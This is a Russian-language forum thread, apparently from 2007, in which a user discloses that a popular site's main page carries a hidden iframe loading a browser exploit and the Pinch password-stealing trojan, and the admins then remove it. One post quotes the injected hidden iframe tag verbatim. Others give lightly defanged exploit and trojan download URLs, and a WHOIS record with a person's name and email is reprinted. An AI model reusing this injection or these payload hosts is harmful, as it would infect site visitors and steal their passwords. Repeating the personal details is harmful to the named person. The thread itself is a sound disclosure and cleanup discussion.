Ребят, не хорошо как то. У вас тут айфрэйм висит с эксплойтом а вы не чешетесь даже. Сейчас глянул что да как:

Эксплойт висит на fen0men.info, пинч качается с trafficmanager.org
Сейчас постораюсь выковырить эксплойты эти оттуда, чтоб исходники глянуть. Но пинч вам точно старается подгруиться. Единственное что - фаер у мну так и не запищал(Jetico - его пока не обходили не разу), так что либо трой не подгрузился у мну т.к. я запросы прервал, либо просто напросто ждет.

Сам эксплойт - http://f_e_n_0_m_е_n.info/exр/indeх.php (не ходите по сылке - заразитесь). Сейчас запущусь под варей, и попробую вытащить еще.

далее с него идет GET запрос на http://t_r_a_f_f_m_a_n_a_g_e_r.org/sv/

/home/nhfaa123/domains/traffmanager.org/public_html/sv/index.php

http://_traffmаnаger.оrg/sv/file.eхe - сам трой. Обычный пинч. И то палящийся. Кидсы...


Domain Name:FEN0MEN.INFO
Created On:26-May-2007 10:49:20 UTC
Last Updated On:27-May-2007 05:58:17 UTC
Expiration Date:26-May-2008 10:49:20 UTC
Registrant ID:DI_6572249
Registrant Name:Ignatovich Oleg Valerevich
Registrant Organization:N/A
Registrant Street1:Alisha 18 - 24
Registrant City:Moskva
Registrant State/Province:Moskovskaya oblast
Registrant Postal Code:220020
Registrant Country:RU
Registrant Email:mutigullin.ilnaz@gmail.com

Такие смешные епт))

Ребята сейчас в реальном времени все переделывают))) Други урл, сылки и т.д. Так что админ - лезь на серв и отлавливай сессии! ;)

Оп-па, если это правда... Тебе бы надо это в личку SFY отправить.

Из этих терминов нифига не понял, типа че хакеры взломали Мобайл Ревью, и все портять аки тараканы?

NoobHack, а ссылочки то нерабочие.

903sh_user, ты попробуй без underlines введи.

903sh_user, специально так, если хочешь подловить вирус - убери пробелы или набей вручную.

NoobHack, а ссылочки то нерабочие.
Ты подчеркивания убери. Так же я некоторые англ буквы на русские заменил.
Сейчас выложу два скрина.

Скрины:

Ясно...А так из первого сообщения я мало что понял...слов умных там много.

Вообщем каждый кто использует InternetExplorer - при заходе на сайт подхватывает вирус.

NoobHack, у меня Опера и сейчас касперский на максиуме сканит систему. А вообще это еще вчера заметили (http://forum.mobile-review.com/showthread.php?t=47963). Подтверждаю, я тоже это в исходниках нашел.

NoobHack, .... какие проявления этого вируса?

NoobHack, у меня NOD молчит...

NoobHack, у меня NOD молчит...
Ребятки сейчас переписывают что то там у себя, так что в данную минуту ничего не подгрузишь.
Ну а трой он в итоге подгружает вот тут:
http://t_r_a_f_f_m_a_n_a_g_e_r.org/sv/file.php



NoobHack, .... какие проявления этого вируса?
ну ты попадаешь в бот нет, это раз. Два - у тебя все пассы вытаскиваются. И если есть что ни будь у тебя на компе интересное (красивые аси, номера кредиток, онлайн банкинг и т.д.) то это просто напросто крысится.

через Opera хожу, Dr Web юзаю никакой реакции.

через Opera хожу, Dr Web юзаю никакой реакции.
Эксплойт для IE. В некотрых случаях и для FireFox(у тех у кого последнее обновление лисы есть - все норм).

Knight, через оперу у меня тоже молчит, через IE не рискую. Похоже, только троян пароли ворует.

NoobHack, а пароли откуда угодно? или только из определёных программ? просто у меня ICQ только в QIP а пароли только в Жезле в Opera. в изходном тексте действительно есть
<iframe src='http://fen0men.info/exp/index.php' width='0' height='0' style='visibility: hidden;'></iframe>

NoobHack, а на стабильность работы ОС этот вирус влияет?Т.е глюки от него могут быть?

903sh_user, не думаю, просто, тихонечко списывает и отправляет владельцу все пароли.

Starwolf, Просто у меня с позовчерашнего дня ИЕ подглючивает...вот думал,может от этого...

Windows Vista, Dr Web 4.44 обновленный только что, браузер IE 7, Opera 9.21. никакой реакции. видимо вирус под XP только :)

браузер IE 7
С IE 7 не пробовал.


NoobHack, а пароли откуда угодно? или только из определёных программ? просто у меня ICQ только в QIP а пароли только в Жезле в Opera. в изходном тексте действительно есть
О возможностях трояна можно прочитать тут:
http://pinch3.net/static/mod.html

NoobHack, гы, я конечно с вирусами не работаю, но то, что вы зарегелись тут сегодня, как то не отводит от вас все сомнения в том, что эт не ваша работа.Хотя надеюсь, что ошибаюсь...;)

Если кратенько, то ворует пароли ОТОВСЮДУ, все браузеры (включая и Оперу), все ICQ-шные клиенты, даже с Mail.ru-агента и CuteFTP (не говоря уже о The Bat)... + есть клавиатурный шпион и снимает скрины.
P.S. А у меня тоже Виста и IE7, рискнул проверить - ничего не видит.

кароч не грузится это вирус ни хрена под Vista :) даже из-под Лисы

Эксплойт для IE. В некотрых случаях и для FireFox(у тех у кого последнее обновление лисы есть - все норм).

как всегда опера рулит ;)

Starwolf, видимо вирь не кросплатформаный :rotate: ставьте Windows Vista :super: самую безопасную Windows на земле :cool: :p

NoobHack, гы, я конечно с вирусами не работаю, но то, что вы зарегелись тут сегодня, как то не отводит от вас все сомнения в том, что эт не ваша работа.Хотя надеюсь, что ошибаюсь...
Была бы моя работа - я тут бы вообще не появился. А зарегился я специально для того, что бы админы хоть немного обратили внимание.
P.S: я на безопасника учусь.

Starwolf, видимо вирь не кросплатформаный :rotate: ставьте Windows Vista :super: самую безопасную Windows на земле :cool: :p :eyes:

Хм, не далее как позавчера обновил Лису на самую последнюю версию.

Starwolf, видимо вирь не кросплатформаный ставьте Windows Vista самую безопасную Windows на земле
Это скорее не в Vista'е дело, а в IE 7'ом.

NoobHack, я что-то немножко не понял - у меня "огненная лиса" 2 с чем-то там (2.0~) и обновления какието скачивал недавно. Мне стоит боятся этой вирусни?

NoobHack, в Висте тоже немного есть, когда я месяц назад проверял систему, Касперский нашел пару вирусов, так все они лежали мертвым грузом и ничего не могли сделать.
Проверил критические области - ничего нет, сканить всю систему не буду, все равно ничего нет, пока нет.

NoobHack, я что-то немножко не понял - у меня "огненная лиса" 2 с чем-то там (2.0~) и обновления какието скачивал недавно. Мне стоит боятся этой вирусни?
Скорее всего нет, но лучше все же поставьте FireWall (Аутпост например) и антивирус. Сейчас скорее всего для вас обошлось, но все же в интернете много всяких гадостей и FireWall + Антивирус никогда не повредит.


Касперский нашел пару вирусов, так все они лежали мертвым грузом и ничего не могли сделать.
Радуемся тогда :) А на самом деле самая вирусо защитная система это Linux :spy: И не из-за того, что такая защищенная, а из-за того что нет смысла писать под нее вирусы, слишком мало народа ее использует. Так же пока и с Vista'ой. Как только Виста станет популярнее - и вирусы будут, и уязвимости и прочие "радости".

Desert Eagle,
Видать это обновление содержит "противоядие", так что думаю бояться не стоит. Хотя сам проверил антивирусником, а сейчас Оутпостом сканирую.

NoobHack, причём аутпост не ниже 4го, судя по всему надо.

NoobHack, ну Касперский стоит 6, да и кроме этого сайта и еще парочки литературных (для учебы) ни куда не хожу. Спасибо, буду спать спокойно! :)

NoobHack, тогда уж MacOS.

NoobHack, тогда уж MacOS.
Возможно, не буду спросить. :) Да, аут пост не ниже 4ого.

а у меня на компе есть образ с 37000 вирусов. скачены с torrents.ru

Сейчас разбираемся, пока точнее сказать не могу.

удалили из HTML кода главной страницы.

Ещё не удалили, беспокоит даже на Огненной лисе. Благо Касперский помогает.

Судя по описанию,троян довольно серьёзный...
Оторвать нужно руки и голову создателям подобного кала!

Приношу извинения за подобные выкрутасы. Завтра же все лог файлы и вся информация будет передана в милицию.

McMaster,
удалили

ничего себе новости. Нубхак молодец, кстати :)

NoobHack
Выражаю благодарность за бдительность.

NoobHack,
Огромное спасибо!!

NoobHack, и от меня спасибо, даже не смотря на то, что мне этот вирус ничего не мог сделать.

Хорошо, а чем теперь лучше систему сканить? у меня НОД и Доктор Веб стоят, они распознают этот троян, если он уже в ОС сидит?

Oleg1985, нод, с последними обновлениями должен точно увидеть.

Oleg1985, оба стоят? одновременно?

P.S: я на безопасника учусь.

Не секрет, где?

Поясню свою мысль: судя по вашим постам, вы сохранили живой склад ума, не испорченный советскими преподавателями программирования. Что действительно редкость, для людей, учащихся на IT-специальности здесь и сейчас. Не то вам очень повезло, и у вас иммунитет на преподавателей, не то преподавать действительно стали лучше. =)

P. S. У самого Linux, Opera и отключённые по умолчанию <iframe ...>. ;)

да.. на работе НОД ругался вчера.
Грустно, Товарисчи! :(

обновил только что НОД, не орет и слава богу))
А по существу, действительно грустно...

То то я и смотрю у меня вчера МР постоянно глючил выкидывая из нета и закрывая одновременно все свернутые окна.....досадно(((

Poul, этот вирь не такого действия

Не за что, товарищи!


Завтра же все лог файлы и вся информация будет передана в милицию.

Скорее всего не поможет :( В данный момент наш суд не может объективно подходить к искам такого типа. Но будем надеяться.

Дык блин. Они не то ловять :)
У них, кто-то в команде поймал трояна.
Этот троян - выбирает сохранённые FTP пароли и перезаливает index файл вставляя туда iframe.
Я ж говорю, стопать FTP сервис надо и пользовать scp.

У меня NOD32 тоже молчал. Возможно, что Comodo Firewall это заблокировал...

Либо я просто не заходил на главную страницу. У меня в избранном ссылка на страницу новостей, а не на главную.

Юзаю Maxthon (он на базе ишака), AVG молчит... вроде все нормуль..

Как хорошо что у меня МАС. А я думал "хакеров в белых шляпах" не осталось!

Опа! а я как раз каспера отрубивши был ,сейчас всё прочитал и включил :)

noskoff, поздно включил, уже все убрали.

Может новый кинем? Веселей

Стояло все nod 32,vista,ie7,все молчали,сегодня поставил kav 6 тут же нашел эту заразу на компе.

Высот блин на таком посещаемом сайте,вирус который еще и не все ав программы видят,представляю сколько им заразилось машин.